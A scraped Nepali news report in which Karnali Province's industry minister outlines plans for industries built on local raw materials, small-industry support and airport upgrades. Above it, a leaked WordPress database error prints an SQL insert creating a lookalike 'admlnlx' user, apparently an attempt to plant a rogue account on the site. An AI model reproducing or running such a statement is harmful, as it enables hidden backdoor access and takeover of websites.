WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BppVnO4kKFiYhhBPkGHs5oghIWyJAj0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 00:23:16', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । कर्णाली प्रदेशका उद्योग, पर्यटन, वन तथा वातावरणमन्त्री वीरबहादुर शाहीले स्थानीय कच्चापदार्थमा आधारित उद्योगमा जोड दिने बताएको छ ।
कर्णालीमा ठूला लगानीका उद्योग नभएको उल्लेख गर्दै मन्त्री शाहीले स्थानीय कच्चापदार्थमा आधारित उद्योग विकासलाई प्राथमिकतामा राखेको बताए । “चालु आव २०७९/८० को बजेट कार्यान्वयनमा मेरो विशेष जोड हुनेछ”, उनले भने, “प्रदेशस्थित लगानी प्रवद्र्धन बोर्डमार्फत साना उद्योगको विकास र प्रवद्र्धनमा पनि जोड दिन्छु ।”
कर्णालीको जाजरकोट, सुर्खेत र दैलेखमा खानी लगायतका प्राकृतिक स्रोतको उपयोगका लागि यहाँको हावापानी र माटो सुहाउँदो उद्योग मोडेलमा जोड दिने उहाँले बताउनुभयो । उद्योगी व्यवसायीलाई ब्याजमा सहुलियत दिन प्रदेश सरकारले सहयोग गर्ने मन्त्री शाहीको भनाइ थियो ।
कर्णालीको जडीबुटीको राजस्व सङ्घीय सरकारलाई बुझाउनुपर्ने नियमले प्रदेशका जनता मारमा परेका मन्त्री शाहीले बताउनुभयो । कर्णालीका छ विमानस्थलको स्तरोन्नति र विकासमा प्रदेश सरकारले जोड दिने उहाँले उल्लेख गरे । रासस